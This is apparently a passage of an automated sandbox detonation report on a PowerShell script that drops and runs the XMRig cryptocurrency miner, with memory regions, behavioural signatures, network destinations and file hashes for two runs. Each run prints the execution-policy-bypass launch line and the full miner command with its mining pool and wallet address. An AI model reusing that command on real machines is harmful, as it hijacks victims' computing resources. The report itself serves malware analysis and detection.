memory/3372-59-0x000001A0E84C0000-0x000001A0E84E0000-memory.dmp
memory/3372-60-0x000001A0E84E0000-0x000001A0E8500000-memory.dmp
memory/3372-61-0x00007FF6C4130000-0x00007FF6C4D63000-memory.dmp
memory/3372-62-0x00007FF6C4130000-0x00007FF6C4D63000-memory.dmp
memory/3372-63-0x00007FF6C4130000-0x00007FF6C4D63000-memory.dmp
memory/3372-64-0x00007FF6C4130000-0x00007FF6C4D63000-memory.dmp
memory/3372-65-0x00007FF6C4130000-0x00007FF6C4D63000-memory.dmp
memory/3372-66-0x00007FF6C4130000-0x00007FF6C4D63000-memory.dmp
memory/3372-67-0x00007FF6C4130000-0x00007FF6C4D63000-memory.dmp
memory/3372-68-0x00007FF6C4130000-0x00007FF6C4D63000-memory.dmp
memory/3372-69-0x00007FF6C4130000-0x00007FF6C4D63000-memory.dmp
memory/3372-70-0x00007FF6C4130000-0x00007FF6C4D63000-memory.dmp
memory/3372-71-0x00007FF6C4130000-0x00007FF6C4D63000-memory.dmp
memory/3372-72-0x00007FF6C4130000-0x00007FF6C4D63000-memory.dmp
memory/3372-73-0x00007FF6C4130000-0x00007FF6C4D63000-memory.dmp
memory/3372-74-0x00007FF6C4130000-0x00007FF6C4D63000-memory.dmp
memory/3372-75-0x00007FF6C4130000-0x00007FF6C4D63000-memory.dmp
memory/3372-76-0x00007FF6C4130000-0x00007FF6C4D63000-memory.dmp
memory/3372-77-0x00007FF6C4130000-0x00007FF6C4D63000-memory.dmp
memory/3372-78-0x00007FF6C4130000-0x00007FF6C4D63000-memory.dmp
memory/3372-79-0x00007FF6C4130000-0x00007FF6C4D63000-memory.dmp
memory/3372-80-0x00007FF6C4130000-0x00007FF6C4D63000-memory.dmp
memory/3372-81-0x00007FF6C4130000-0x00007FF6C4D63000-memory.dmp
memory/3372-82-0x00007FF6C4130000-0x00007FF6C4D63000-memory.dmp
memory/3372-83-0x00007FF6C4130000-0x00007FF6C4D63000-memory.dmp
memory/3372-84-0x00007FF6C4130000-0x00007FF6C4D63000-memory.dmp
memory/3372-85-0x00007FF6C4130000-0x00007FF6C4D63000-memory.dmp
memory/3372-86-0x00007FF6C4130000-0x00007FF6C4D63000-memory.dmp
memory/3372-87-0x00007FF6C4130000-0x00007FF6C4D63000-memory.dmp
memory/3372-88-0x00007FF6C4130000-0x00007FF6C4D63000-memory.dmp
memory/3372-89-0x00007FF6C4130000-0x00007FF6C4D63000-memory.dmp
memory/3372-90-0x00007FF6C4130000-0x00007FF6C4D63000-memory.dmp
memory/3372-91-0x00007FF6C4130000-0x00007FF6C4D63000-memory.dmp
memory/3372-92-0x00007FF6C4130000-0x00007FF6C4D63000-memory.dmp
memory/3372-93-0x00007FF6C4130000-0x00007FF6C4D63000-memory.dmp
memory/3372-94-0x00007FF6C4130000-0x00007FF6C4D63000-memory.dmp
memory/3372-95-0x00007FF6C4130000-0x00007FF6C4D63000-memory.dmp
memory/3372-96-0x00007FF6C4130000-0x00007FF6C4D63000-memory.dmp
memory/3372-97-0x00007FF6C4130000-0x00007FF6C4D63000-memory.dmp
memory/3372-98-0x00007FF6C4130000-0x00007FF6C4D63000-memory.dmp
memory/3372-99-0x00007FF6C4130000-0x00007FF6C4D63000-memory.dmp
memory/3372-100-0x00007FF6C4130000-0x00007FF6C4D63000-memory.dmp
memory/3372-101-0x00007FF6C4130000-0x00007FF6C4D63000-memory.dmp
memory/3372-102-0x00007FF6C4130000-0x00007FF6C4D63000-memory.dmp
memory/3372-103-0x00007FF6C4130000-0x00007FF6C4D63000-memory.dmp
memory/3372-104-0x00007FF6C4130000-0x00007FF6C4D63000-memory.dmp
memory/3372-105-0x00007FF6C4130000-0x00007FF6C4D63000-memory.dmp
memory/3372-106-0x00007FF6C4130000-0x00007FF6C4D63000-memory.dmp
memory/3372-107-0x00007FF6C4130000-0x00007FF6C4D63000-memory.dmp
memory/3372-108-0x00007FF6C4130000-0x00007FF6C4D63000-memory.dmp
memory/3372-109-0x00007FF6C4130000-0x00007FF6C4D63000-memory.dmp
memory/3372-110-0x00007FF6C4130000-0x00007FF6C4D63000-memory.dmp
memory/3372-111-0x00007FF6C4130000-0x00007FF6C4D63000-memory.dmp
memory/3372-112-0x00007FF6C4130000-0x00007FF6C4D63000-memory.dmp
memory/3372-113-0x00007FF6C4130000-0x00007FF6C4D63000-memory.dmp
memory/3372-114-0x00007FF6C4130000-0x00007FF6C4D63000-memory.dmp
memory/3372-115-0x00007FF6C4130000-0x00007FF6C4D63000-memory.dmp
memory/3372-116-0x00007FF6C4130000-0x00007FF6C4D63000-memory.dmp
memory/3372-117-0x00007FF6C4130000-0x00007FF6C4D63000-memory.dmp
memory/3372-118-0x00007FF6C4130000-0x00007FF6C4D63000-memory.dmp
memory/3372-119-0x00007FF6C4130000-0x00007FF6C4D63000-memory.dmp
Analysis: behavioral4
Detonation Overview
Submitted
2024-05-27 00:27
Reported
2024-05-27 01:23
Platform
win11-20240508-en
Max time kernel
1791s
Max time network
1765s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2616 wrote to memory of 3608 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 2616 wrote to memory of 3608 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (2).ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| GB | 161.35.34.195:443 | rx.unmineable.com | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
Files
memory/2616-0-0x00007FFEA7233000-0x00007FFEA7235000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_x135bfkr.4ln.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/2616-9-0x0000018477420000-0x0000018477442000-memory.dmp
memory/2616-10-0x00007FFEA7230000-0x00007FFEA7CF2000-memory.dmp
memory/2616-11-0x00007FFEA7230000-0x00007FFEA7CF2000-memory.dmp
memory/2616-12-0x00007FFEA7230000-0x00007FFEA7CF2000-memory.dmp
memory/2616-14-0x0000018477920000-0x0000018477932000-memory.dmp
memory/2616-15-0x00000184774C0000-0x00000184774CA000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
memory/3608-46-0x0000010EB5BB0000-0x0000010EB5BD0000-memory.dmp
memory/3608-47-0x0000010EB74B0000-0x0000010EB74D0000-memory.dmp
memory/3608-48-0x00007FF6CB730000-0x00007FF6CC363000-memory.dmp
memory/2616-49-0x00007FFEA7230000-0x00007FFEA7CF2000-memory.dmp
memory/2616-51-0x00007FFEA7233000-0x00007FFEA7235000-memory.dmp
memory/3608-50-0x00007FF6CB730000-0x00007FF6CC363000-memory.dmp
memory/3608-54-0x0000010EB74F0000-0x0000010EB7510000-memory.dmp
memory/3608-53-0x0000010EB74D0000-0x0000010EB74F0000-memory.dmp
memory/2616-52-0x00007FFEA7230000-0x00007FFEA7CF2000-memory.dmp
memory/3608-55-0x00007FF6CB730000-0x00007FF6CC363000-memory.dmp
memory/3608-56-0x00007FF6CB730000-0x00007FF6CC363000-memory.dmp
memory/3608-57-0x0000010EB74D0000-0x0000010EB74F0000-memory.dmp
memory/3608-58-0x0000010EB74F0000-0x0000010EB7510000-memory.dmp
memory/3608-59-0x00007FF6CB730000-0x00007FF6CC363000-memory.dmp
memory/3608-60-0x00007FF6CB730000-0x00007FF6CC363000-memory.dmp
memory/3608-61-0x00007FF6CB730000-0x00007FF6CC363000-memory.dmp
memory/3608-62-0x00007FF6CB730000-0x00007FF6CC363000-memory.dmp
memory/3608-63-0x00007FF6CB730000-0x00007FF6CC363000-memory.dmp
memory/3608-64-0x00007FF6CB730000-0x00007FF6CC363000-memory.dmp
memory/3608-65-0x00007FF6CB730000-0x00007FF6CC363000-memory.dmp
memory/3608-66-0x00007FF6CB730000-0x00007FF6CC363000-memory.dmp
memory/3608-67-0x00007FF6CB730000-0x00007FF6CC363000-memory.dmp
memory/3608-68-0x00007FF6CB730000-0x00007FF6CC363000-memory.dmp
memory/3608-69-0x00007FF6CB730000-0x00007FF6CC363000-memory.dmp
memory/3608-70-0x00007FF6CB730000-0x00007FF6CC363000-memory.dmp
memory/3608-71-0x00007FF6CB730000-0x00007FF6CC363000-memory.dmp
memory/3608-72-0x00007FF6CB730000-0x00007FF6CC363000-memory.dmp
memory/3608-73-0x00007FF6CB730000-0x00007FF6CC363000-memory.dmp
memory/3608-74-0x00007FF6CB730000-0x00007FF6CC363000-memory.dmp
memory/3608-75-0x00007FF6CB730000-0x00007FF6CC363000-memory.dmp
memory/3608-76-0x00007FF6CB730000-0x00007FF6CC363000-memory.dmp
memory/3608-77-0x00007FF6CB730000-0x00007FF6CC363000-memory.dmp
memory/3608-78-0x00007FF6CB730000-0x00007FF6CC363000-memory.dmp
memory/3608-79-0x00007FF6CB730000-0x00007FF6CC363000-memory.dmp
memory/3608-80-0x00007FF6CB730000-0x00007FF6CC363000-memory.dmp
memory/3608-81-0x00007FF6CB730000-0x00007FF6CC363000-memory.dmp
memory/3608-82-0x00007FF6CB730000-0x00007FF6CC363000-memory.dmp
memory/3608-83-0x00007FF6CB730000-0x00007FF6CC363000-memory.dmp
memory/3608-84-0x00007FF6CB730000-0x00007FF6CC363000-memory.dmp
memory/3608-85-0x00007FF6CB730000-0x00007FF6CC363000-memory.dmp
memory/3608-86-0x00007FF6CB730000-0x00007FF6CC363000-memory.dmp
memory/3608-87-0x00007FF6CB730000-0x00007FF6CC363000-memory.dmp
memory/3608-88-0x00007FF6CB730000-0x00007FF6CC363000-memory.dmp
memory/3608-89-0x00007FF6CB730000-0x00007FF6CC363000-memory.dmp
memory/3608-90-0x00007FF6CB730000-0x00007FF6CC363000-memory.dmp
memory/3608-91-0x00007FF6CB730000-0x00007FF6CC363000-memory.dmp
memory/3608-92-0x00007FF6CB730000-0x00007FF6CC363000-memory.dmp
memory/3608-93-0x00007FF6CB730000-0x00007FF6CC363000-memory.dmp
memory/3608-94-0x00007FF6CB730000-0x00007FF6CC363000-memory.dmp
memory/3608-95-0x00007FF6CB730000-0x00007FF6CC363000-memory.dmp
memory/3608-96-0x00007FF6CB730000-0x00007FF6CC363000-memory.dmp
memory/3608-97-0x00007FF6CB730000-0x00007FF6CC363000-memory.dmp
memory/3608-98-0x00007FF6CB730000-0x00007FF6CC363000-memory.dmp
memory/3608-99-0x00007FF6CB730000-0x00007FF6CC363000-memory.dmp
memory/3608-100-0x00007FF6CB730000-0x00007FF6CC363000-memory.dmp
memory/3608-101-0x00007FF6CB730000-0x00007FF6CC363000-memory.dmp
memory/3608-102-0x00007FF6CB730000-0x00007FF6CC363000-memory.dmp
memory/3608-103-0x00007FF6CB730000-0x00007FF6CC363000-memory.dmp
memory/3608-104-0x00007FF6CB730000-0x00007FF6CC363000-memory.dmp
memory/3608-105-0x00007FF6CB730000-0x00007FF6CC363000-memory.dmp
memory/3608-106-0x00007FF6CB730000-0x00007FF6CC363000-memory.dmp
memory/3608-107-0x00007FF6CB730000-0x00007FF6CC363000-memory.dmp
memory/3608-108-0x00007FF6CB730000-0x00007FF6CC363000-memory.dmp
memory/3608-109-0x00007FF6CB730000-0x00007FF6CC363000-memory.dmp
memory/3608-110-0x00007FF6CB730000-0x00007FF6CC363000-memory.dmp
memory/3608-111-0x00007FF6CB730000-0x00007FF6CC363000-memory.dmp
memory/3608-112-0x00007FF6CB730000-0x00007FF6CC363000-memory.dmp
memory/3608-113-0x00007FF6CB730000-0x00007FF6CC363000-memory.dmp
memory/3608-114-0x00007FF6CB730000-0x00007FF6CC363000-memory.dmp
memory/3608-115-0x00007FF6CB730000-0x00007FF6CC363000-memory.dmp
memory/3608-116-0x00007FF6CB730000-0x00007FF6CC363000-memory.dmp
memory/3608-117-0x00007FF6CB730000-0x00007FF6CC363000-memory.dmp
Analysis: behavioral19
Detonation Overview
Submitted
2024-05-27 00:27
Reported
2024-05-27 01:28
Platform
win10v2004-20240426-en
Max time kernel
1790s
Max time network
1791s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 4616 wrote to memory of 4752 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 4616 wrote to memory of 4752 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (6).ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 232.168.11.51.in-addr.arpa | udp |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 71.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 82.90.14.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | rx.unmineable.com | udp |
| GB | 161.35.34.195:443 | rx.unmineable.com | tcp |
| US | 8.8.8.8:53 | 195.34.35.161.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 28.118.140.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 154.239.44.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 86.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.31.95.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 0.205.248.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 11.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 4.173.189.20.in-addr.arpa | udp |
Files
memory/4616-0-0x00007FFADBFD3000-0x00007FFADBFD5000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_gs4w50ua.qju.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/4616-1-0x000002CE4B5B0000-0x000002CE4B5D2000-memory.dmp
memory/4616-11-0x00007FFADBFD0000-0x00007FFADCA91000-memory.dmp
memory/4616-12-0x00007FFADBFD0000-0x00007FFADCA91000-memory.dmp
memory/4616-14-0x00007FFADBFD0000-0x00007FFADCA91000-memory.dmp
memory/4616-15-0x000002CE4BAA0000-0x000002CE4BAB2000-memory.dmp
memory/4616-16-0x000002CE4B740000-0x000002CE4B74A000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
memory/4752-47-0x00000254FF750000-0x00000254FF770000-memory.dmp
memory/4752-48-0x0000025481440000-0x0000025481460000-memory.dmp
memory/4752-49-0x00007FF643870000-0x00007FF6444A3000-memory.dmp
memory/4616-50-0x00007FFADBFD0000-0x00007FFADCA91000-memory.dmp
memory/4752-54-0x0000025481480000-0x00000254814A0000-memory.dmp
memory/4752-53-0x0000025481460000-0x0000025481480000-memory.dmp
memory/4616-52-0x00007FFADBFD3000-0x00007FFADBFD5000-memory.dmp
memory/4752-51-0x00007FF643870000-0x00007FF6444A3000-memory.dmp
memory/4616-55-0x00007FFADBFD0000-0x00007FFADCA91000-memory.dmp
memory/4752-56-0x00007FF643870000-0x00007FF6444A3000-memory.dmp
memory/4752-57-0x00007FF643870000-0x00007FF6444A3000-memory.dmp
memory/4752-59-0x0000025481480000-0x00000254814A0000-memory.dmp
memory/4752-58-0x0000025481460000-0x0000025481480000-memory.dmp
memory/4752-60-0x00007FF643870000-0x00007FF6444A3000-memory.dmp
memory/4752-61-0x00007FF643870000-0x00007FF6444A3000-memory.dmp
memory/4752-62-0x00007FF643870000-0x00007FF6444A3000-memory.dmp
memory/4752-63-0x00007FF643870000-0x00007FF6444A3000-memory.dmp
memory/4752-64-0x00007FF643870000-0x00007FF6444A3000-memory.dmp
memory/4752-65-0x00007FF643870000-0x00007FF6444A3000-memory.dmp
memory/4752-66-0x00007FF643870000-0x00007FF6444A3000-memory.dmp
memory/4752-67-0x00007FF643870000-0x00007FF6444A3000-memory.dmp
memory/4752-68-0x00007FF643870000-0x00007FF6444A3000-memory.dmp
memory/4752-69-0x00007FF643870000-0x00007FF6444A3000-memory.dmp
memory/4752-70-0x00007FF643870000-0x00007FF6444A3000-memory.dmp
memory/4752-71-0x00007FF643870000-0x00007FF6444A3000-memory.dmp
memory/4752-72-0x00007FF643870000-0x00007FF6444A3000-memory.dmp
memory/4752-73-0x00007FF643870000-0x00007FF6444A3000-memory.dmp
memory/4752-74-0x00007FF643870000-0x00007FF6444A3000-memory.dmp
memory/4752-75-0x00007FF643870000-0x00007FF6444A3000-memory.dmp
memory/4752-76-0x00007FF643870000-0x00007FF6444A3000-memory.dmp
memory/4752-77-0x00007FF643870000-0x00007FF6444A3000-memory.dmp
memory/4752-78-0x00007FF643870000-0x00007FF6444A3000-memory.dmp
memory/4752-79-0x00007FF643870000-0x00007FF6444A3000-memory.dmp
memory/4752-80-0x00007FF643870000-0x00007FF6444A3000-memory.dmp
memory/4752-81-0x00007FF643870000-0x00007FF6444A3000-memory.dmp
memory/4752-82-0x00007FF643870000-0x00007FF6444A3000-memory.dmp
memory/4752-83-0x00007FF643870000-0x00007FF6444A3000-memory.dmp
memory/4752-84-0x00007FF643870000-0x00007FF6444A3000-memory.dmp
memory/4752-85-0x00007FF643870000-0x00007FF6444A3000-memory.dmp
memory/4752-86-0x00007FF643870000-0x00007FF6444A3000-memory.dmp
memory/4752-87-0x00007FF643870000-0x00007FF6444A3000-memory.dmp
memory/4752-88-0x00007FF643870000-0x00007FF6444A3000-memory.dmp
memory/4752-89-0x00007FF643870000-0x00007FF6444A3000-memory.dmp
memory/4752-90-0x00007FF643870000-0x00007FF6444A3000-memory.dmp
memory/4752-91-0x00007FF643870000-0x00007FF6444A3000-memory.dmp
memory/4752-92-0x00007FF643870000-0x00007FF6444A3000-memory.dmp
memory/4752-93-0x00007FF643870000-0x00007FF6444A3000-memory.dmp
memory/4752-94-0x00007FF643870000-0x00007FF6444A3000-memory.dmp
memory/4752-95-0x00007FF643870000-0x00007FF6444A3000-memory.dmp
memory/4752-96-0x00007FF643870000-0x00007FF6444A3000-memory.dmp
memory/4752-97-0x00007FF643870000-0x00007FF6444A3000-memory.dmp
memory/4752-98-0x00007FF643870000-0x00007FF6444A3000-memory.dmp
memory/4752-99-0x00007FF643870000-0x00007FF6444A3000-memory.dmp
memory/4752-100-0x00007FF643870000-0x00007FF6444A3000-memory.dmp
memory/4752-101-0x00007FF643870000-0x00007FF6444A3000-memory.dmp
